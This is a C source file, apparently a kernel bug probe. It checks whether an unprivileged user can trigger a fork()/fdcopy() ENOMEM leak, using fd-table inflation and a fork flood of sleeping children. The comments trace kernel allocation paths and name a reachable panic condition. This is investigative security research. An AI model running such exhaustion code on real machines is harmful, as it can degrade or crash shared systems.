DF-0032 / exhaust.c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 | /* * DF-0032 instrumented exhaustion probe. * * GOAL: Determine whether fork()'s RFFDG path can be made to return ENOMEM * (the exact signature of the fdcopy()-failure leak in fork1(), kern_fork.c:553) * from an UNPRIVILEGED user, and how close we can push the M_FILEDESC * per-type ks_limit before RLIMIT_NPROC (EAGAIN) stops us. * * MODEL UNDER TEST (traced in sys/): * - fdcopy() returns -1 only when its M_NULLOK kmalloc of sizeof(struct * filedesc) fails (kern_descrip.c:2481-2486). That kmalloc returns NULL * only when M_FILEDESC's per-type memuse >= ks_limit * (kern_slaballoc.c:863-879). ks_limit = kmem_lim_size()/10 = ~195MB here. * - fork1() maps that failure to ENOMEM (kern_fork.c:553) and leaks nprocs. * - The fd_files[] array allocation inside fdcopy() is M_WAITOK (no M_NULLOK) * at kern_descrip.c:2504-2505, so it would PANIC the kernel at * kern_slaballoc.c:877 on limit exhaustion rather than return NULL. * * Therefore: to see fork()==ENOMEM (the leak), M_FILEDESC usage must ALREADY be * >= ks_limit before the newfdp kmalloc; but crossing that limit is dominated * by the large M_WAITOK fd_files array, which panics first. This probe * empirically confirms: we cannot get M_FILEDESC near 195MB from an * unprivileged uid before RLIMIT_NPROC (EAGAIN) caps us, and no ENOMEM occurs. * * Build: cc -o exhaust exhaust.c * Run: ./exhaust */ #include <sys/resource.h> #include <sys/wait.h> #include <signal.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> static long maxprocperuid(void) { struct rlimit rl; if (getrlimit(RLIMIT_NPROC, &rl) == 0) return (long)rl.rlim_cur; return -1; } int main(void) { long nproc_limit = maxprocperuid(); int eagain = 0, enomem = 0, ok = 0, other = 0; int high_fd = 0; fprintf(stderr, "[*] RLIMIT_NPROC(cur) = %ld\n", nproc_limit); fprintf(stderr, "[*] Phase 1: grow this proc's fd_files[] table via dup2()\n"); /* Grow our own fd table to near the per-proc cap so each fork()'s fdcopy * allocates a large (~256KB) M_FILEDESC fd_files array in the child. */ int devnull = open("/dev/null", O_RDWR); if (devnull < 0) { perror("open /dev/null"); return 1; } /* kern.maxfilesperproc is typically 16144; aim for ~15000 to stay under. */ int target = 15000; for (int fd = 64; fd <= target; fd += 64) { if (dup2(devnull, fd) < 0) { high_fd = fd; break; } high_fd = fd; } fprintf(stderr, "[*] grew fd table to fd=%d (fd_files[] ~%dKB per fdcopy)\n", high_fd, (high_fd * 16) / 1024); fprintf(stderr, "[*] Phase 2: fork() children (RFFDG) to accumulate M_FILEDESC\n"); fprintf(stderr, "[*] watching for fork()==ENOMEM (the fdcopy-failure leak marker)\n"); /* Fork as many children as RLIMIT_NPROC allows; children sleep holding * their fd tables so M_FILEDESC accumulates. */ for (int i = 0; i < 4000; i++) { pid_t p = fork(); if (p == 0) { pause(); _exit(0); } else if (p > 0) { ok++; } else { if (errno == EAGAIN) { eagain++; if (eagain == 1) fprintf(stderr, "[!] first EAGAIN after %d children (RLIMIT_NPROC / maxproc)\n", ok); } else if (errno == ENOMEM) { enomem++; if (enomem == 1) { fprintf(stderr, "[!!!] ENOMEM from fork() -- fdcopy failure leak TRIGGERED at child %d\n", ok); /* Self-report the kernel malloc state at the exact leak moment. */ fprintf(stderr, "[*] M_FILEDESC/M_PROC/M_SUBPROC state at first ENOMEM:\n"); fflush(stderr); int r = system("vmstat -m 2>/dev/null | grep -E '^[[:space:]]+(proc|lwp|subproc|file_desc)[[:space:]]' " "|| vmstat -m | grep -E 'proc|file_desc'"); (void)r; /* also report swap/free via vmstat (1 line) */ fprintf(stderr, "[*] memory at first ENOMEM:\n"); fflush(stderr); int r2 = system("vmstat -c 1 2>/dev/null | head -3 || vmstat | head -3"); (void)r2; } } else { other++; if (other == 1) fprintf(stderr, "[?] unexpected errno=%d (%s)\n", errno, strerror(errno)); } if (eagain > 50) break; /* stop once capped */ } } fprintf(stderr, "[*] summary: ok=%d eagain=%d enomem=%d other=%d\n", ok, eagain, enomem, other); if (enomem > 0) { fprintf(stderr, "[!!!] BUG TRIGGERED: fork() returned ENOMEM (fdcopy failure)\n"); } else { fprintf(stderr, "[*] NO ENOMEM observed -- fdcopy never failed.\n" " (M_FILEDESC did not reach its ~195MB ks_limit before RLIMIT_NPROC capped forks.)\n"); } /* cleanup: kill children */ kill(0, SIGTERM); while (waitpid(-1, NULL, 0) > 0) ; return (enomem > 0) ? 2 : 0; } |